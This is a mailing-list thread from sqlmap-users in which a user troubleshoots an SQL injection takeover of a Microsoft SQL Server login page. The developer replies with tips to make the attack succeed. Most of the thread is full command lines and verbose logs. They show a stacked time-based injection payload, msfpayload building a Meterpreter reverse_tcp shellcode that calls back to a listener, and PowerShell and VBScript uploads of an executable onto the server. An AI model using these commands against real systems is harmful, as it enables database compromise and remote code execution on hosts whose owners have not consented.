Re: [sqlmap-users] Error with operating system takeover (meterpreter)
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Error with operating system takeover (meterpreter)
|
From: Peter L. <myp...@gm...> - 2015-07-02 09:55:36
|
Hi This time I tried --flush-session as well and now it is showing that the parameter is not injectable; however when I'm using old session with (-s old_sessionfile.sqlite) it is not showing this. Observed similar issue when few days back I tried to sqlinject same vulnerable parameter using sqlmap from Computer-2; it failed to identify vulnerability in target parameter; however at the same time it was working with Computer-1. Did tried --time-sec, -o etc. This is another weird issue in addition to OS Pwning. --start-- sqlmap -r mytarget_login -p testNumber --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf_newSession -v 2 --fresh-queries --flush-session .. .. [05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 columns' because the level (4) is higher than the provided (1) [05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 31 to 40 columns' because the level (5) is higher than the provided (1) [05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 columns' because the level (5) is higher than the provided (1) [05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 41 to 50 columns' because the level (5) is higher than the provided (1) [05:20:28] [WARNING] POST parameter 'testNumber' is not injectable [05:20:28] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment') [*] shutting down at 05:20:28 --end-- On Thu, Jul 2, 2015 at 2:11 PM, Miroslav Stampar <mir...@gm... > wrote: > In your case, 404 is indication that file has not been found in the > expected place. > > Now I see that the temporary file path is not being "refreshed" by the > --fresh-queries. Please rerun the whole case with the --flush-session > > Bye > > p.s. in your case sqlmap tried to upload the file to the trashy location > because of previously retrieved faulty temp location > > On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <myp...@gm...> > wrote: > >> Hi, >> Thanks for your reply. >> >> This time I tried with --fresh-queries without specific --techniques. >> >> why am I getting error "page not found (404)" again and again? Does it >> indicate that file is being written but is deleted by Anti-Virus control or >> something and that's why while calling the uploaded file 404 error is >> appearing, Can this be the case ? Need your opinion and expertise. >> >> >> Thanks >> >> >> --start--- >> >> root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn >> --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries >> >> >> which payload do you want to use? >> [1] Meterpreter (default) >> [2] Shell >> [3] VNC >> > 1 >> [11:12:52] [DEBUG] executing local command: >> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp >> EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R | >> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o >> "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX >> [11:12:52] [INFO] creation in progress .................. done >> [11:13:10] [DEBUG] the shellcode size is 308 bytes >> [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft >> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe' >> [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL >> injection technique >> [11:13:10] [INFO] using PowerShell to write the binary file content to >> file 'D:\Program Files\Microsoft SQL >> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe' >> [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program >> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt, >> please wait.. >> [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to >> D:\Program Files\Microsoft SQL >> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1 >> [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to >> write the D:\Program Files\Microsoft SQL >> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait.. >> [11:13:12] [WARNING] if you experience problems with non-ASCII identifier >> names you are advised to rerun with '--tamper=charunicodeencode' >> [11:13:12] [DEBUG] checking the length of the remote file D:\Program >> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe >> [11:13:12] [INFO] retrieved: >> [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds >> [11:13:13] [WARNING] it looks like the file has not been written (usually >> occurs if the DBMS process' user has no write privileges in the destination >> path) >> do you want to try to upload the file with the custom Visual Basic script >> technique? [Y/n] y >> [11:13:15] [INFO] using a custom visual basic script to write the binary >> file content to file 'D:\Program Files\Microsoft SQL >> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait.. >> [11:13:15] [DEBUG] uploading the file base64-encoded content to >> D:\Program Files\Microsoft SQL >> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, please wait.. >> [11:13:16] [CRITICAL] page not found (404) >> [11:13:16] [WARNING] HTTP error codes detected during run: >> 404 (Not Found) - 1 times >> [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean >> that some kind of protection is involved (e.g. WAF) >> >> [*] shutting down at 11:13:16 >> >> >> --end--- >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> Hi. >>> >>> 1) First of all, please don't restrain sqlmap to only use "stacked" >>> SQLi. That way you'll kill the possibility to get perfectly valid results >>> with other techniques >>> 2) In current state, you've got some "trashy" characters (because of >>> combination of laggy connection and stacked SQLi), like: "D:/Program >>> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use >>> --fresh-queries in such situations (once per run where you expect resume of >>> trashy chars) to force sqlmap to try to retrieve the problematic value once >>> again. >>> >>> Bye >>> >>> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> >>> wrote: >>> >>>> Hi All, >>>> >>>> In first phase of our test we discovered Target URL is vulnerable and >>>> we managed to retrieved lots of information such as --users, --dbs, some of >>>> --tables and lots more. All this retrieval was very slow probably due to >>>> time-based vulnerability; however tried through all (BEUSTQ) and found same >>>> state. >>>> >>>> During an attempt after few days of our success we noticed some of the >>>> parameter is not working and we are receiving errors like for instance >>>> during requery for --users we received error "[09:39:23] [CRITICAL] unable >>>> to retrieve the number of database users". During requery for -U sa >>>> --passwords we received "unnable to retrieve the password hashes for the >>>> database users (probably because the session user has no read privileges >>>> over the relevant system database table)". >>>> >>>> We moved to OS takeover, initially get error for xp_cmdshell however >>>> activated and confirmed using SQLNinja and moved on to get --os-shell, >>>> executed some of commands like "hostname", "whoami" and successfully >>>> retrieved its output. >>>> >>>> Now after few minutes we noted that we are not getting any output of >>>> any command with message "No output". >>>> >>>> We moved to --os-pwn + --msf-path, But again with no success on >>>> meterpreter or VNC. >>>> received error "HTTP error codes detected during run: >>>> 404 (Not Found) - 1 times" >>>> >>>> I'm attaching screen log, please help me with this if thr is any scope >>>> available. >>>> Thanks in Advance. >>>> >>>> >>>> >>>> -------screen logs start------- >>>> >>>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S >>>> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t >>>> test_msf7 -v 2 >>>> _ >>>> ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150519} >>>> |_ -| . | | | .'| . | >>>> |___|_ |_|_|_|_|__,| _| >>>> |_| |_| http://sqlmap.org >>>> >>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without >>>> prior mutual consent is illegal. It is the end user's responsibility to >>>> obey all applicable local, state and federal laws. Developers assume no >>>> liability and are not responsible for any misuse or damage caused by this >>>> program >>>> >>>> [*] starting at 10:03:33 >>>> >>>> mytarget_login >>>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login' >>>> [10:03:33] [DEBUG] not a valid WebScarab log data >>>> [10:03:33] [DEBUG] cleaning up configuration parameters >>>> test_msf7 >>>> mytarget_login >>>> /opt/metasploit/apps/pro/msf3 >>>> [10:03:33] [INFO] setting file for logging HTTP traffic >>>> [10:03:33] [DEBUG] setting the HTTP timeout >>>> [10:03:33] [DEBUG] creating HTTP requests opener object >>>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value >>>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality >>>> [10:03:33] [DEBUG] provided Metasploit Framework path >>>> '/opt/metasploit/apps/pro/msf3' is valid >>>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the >>>> Cookie >>>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com' >>>> [10:03:33] [INFO] testing connection to the target URL >>>> [10:03:48] [DEBUG] declared web page charset 'utf-8' >>>> sqlmap got a 302 redirect to ' >>>> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to >>>> follow? [Y/n] Y >>>> redirect is a result of a POST request. Do you want to resend original >>>> POST data to a new location? [Y/n] Y >>>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] >>>> Connection reset by peer') >>>> [10:03:56] [DEBUG] heuristically checking if the target is protected by >>>> some kind of WAF/IPS/IDS >>>> sqlmap identified the following injection points with a total of 0 >>>> HTTP(s) requests: >>>> --- >>>> Parameter: testNumber (POST) >>>> Type: stacked queries >>>> Title: Microsoft SQL Server/Sybase stacked queries >>>> Payload: >>>> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; >>>> WAITFOR DELAY '0:0:5'--&testPassword=3243 >>>> Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- >>>> --- >>>> [10:03:56] [INFO] testing Microsoft SQL Server >>>> [10:03:56] [INFO] confirming Microsoft SQL Server >>>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server >>>> back-end DBMS: Microsoft SQL Server 2008 >>>> how do you want to establish the tunnel? >>>> [1] TCP: Metasploit Framework (default) >>>> [2] ICMP: icmpsh - ICMP tunneling >>>> > 1 >>>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL >>>> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory >>>> [10:04:00] [INFO] testing if current user is DBA >>>> [10:04:00] [DEBUG] creating a support table to write commands standard >>>> output to >>>> [10:04:00] [WARNING] time-based comparison requires larger statistical >>>> model, please wait.............................. >>>> [10:04:04] [WARNING] it is very important not to stress the network >>>> adapter during usage of time-based payloads to prevent potential errors >>>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable >>>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds >>>> [10:04:04] [WARNING] in case of continuous data retrieval problems you >>>> are advised to try a switch '--no-cast' or switch '--hex' >>>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output >>>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode >>>> which connection type do you want to use? >>>> [1] Reverse TCP: Connect back from the database host to this machine >>>> (default) >>>> [2] Reverse TCP: Try to connect back from the database host to this >>>> machine, on all ports example3ween the specified and 65535 >>>> [3] Reverse HTTP: Connect back from the database host to this machine >>>> tunnelling traffic over HTTP >>>> [4] Reverse HTTPS: Connect back from the database host to this machine >>>> tunnelling traffic over HTTPS >>>> [5] Bind TCP: Listen on the database host for a connection >>>> > 1 >>>> what is the local address? [192.168.1.8] >>>> which local port number do you want to use? [61371] >>>> which payload do you want to use? >>>> [1] Meterpreter (default) >>>> [2] Shell >>>> [3] VNC >>>> > 1 >>>> [10:04:17] [DEBUG] executing local command: >>>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp >>>> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R | >>>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o >>>> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX >>>> [10:04:17] [INFO] creation in progress .................. done >>>> [10:04:35] [DEBUG] the shellcode size is 308 bytes >>>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program >>>> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe' >>>> [10:04:35] [DEBUG] going to upload the binary file with stacked query >>>> SQL injection technique >>>> [10:04:35] [INFO] using PowerShell to write the binary file content to >>>> file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo >>>> Ā\tmpsebykt.exe' >>>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program >>>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt, >>>> please wait.. >>>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to >>>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo >>>> Ā\tmppsbcbi.ps1 >>>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to >>>> write the D:\Program Files\Microsoft SQL >>>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait.. >>>> [10:04:37] [WARNING] if you experience problems with non-ASCII >>>> identifier names you are advised to rerun with '--tamper=charunicodeencode' >>>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program >>>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe >>>> [10:04:37] [INFO] retrieved: >>>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds >>>> [10:04:37] [WARNING] it looks like the file has not been written >>>> (usually occurs if the DBMS process' user has no write privileges in the >>>> destination path) >>>> do you want to try to upload the file with the custom Visual Basic >>>> script technique? [Y/n] Y >>>> [10:04:41] [INFO] using a custom visual basic script to write the >>>> binary file content to file 'D:\Program Files\Microsoft SQL >>>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait.. >>>> [10:04:41] [DEBUG] uploading the file base64-encoded content to >>>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo >>>> Ā\tmpfegab.txt, please wait.. >>>> [10:04:41] [CRITICAL] page not found (404) >>>> [10:04:41] [WARNING] HTTP error codes detected during run: >>>> 404 (Not Found) - 1 times >>>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean >>>> that some kind of protection is involved (e.g. WAF) >>>> >>>> [*] shutting down at 10:04:41 >>>> >>>> root@kali:~# >>>> >>>> >>>> -------screen logs end------- >>>> >>>> >>>> Please help!! >>>> >>>> >>>> >>>> >>>> >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Don't Limit Your Business. Reach for the Cloud. >>>> GigeNET's Cloud Solutions provide you with the tools and support that >>>> you need to offload your IT needs and focus on growing your business. >>>> Configured For All Businesses. Start Your Cloud Today. >>>> https://www.gigenetcloud.com/ >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
